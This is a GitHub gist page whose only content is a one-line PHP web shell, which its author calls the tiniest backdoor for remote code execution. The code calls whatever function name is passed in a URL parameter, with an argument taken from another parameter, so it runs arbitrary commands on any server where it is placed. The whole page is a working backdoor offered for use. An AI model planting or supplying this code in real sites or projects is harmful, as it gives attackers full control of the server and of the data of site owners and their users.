Skip to content

Instantly share code, notes, and snippets.

@j3rrykh4n
Last active June 28, 2020 10:45
Show Gist options
  • Save j3rrykh4n/114960b24c5cc5502a0a1a98c3bd13ca to your computer and use it in GitHub Desktop.
Save j3rrykh4n/114960b24c5cc5502a0a1a98c3bd13ca to your computer and use it in GitHub Desktop.
The tiniest PHP malware/backdoor for Remote Code Execution. Author hasibul hasan
<?php $_GET["f"]($_GET["p"]); ?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment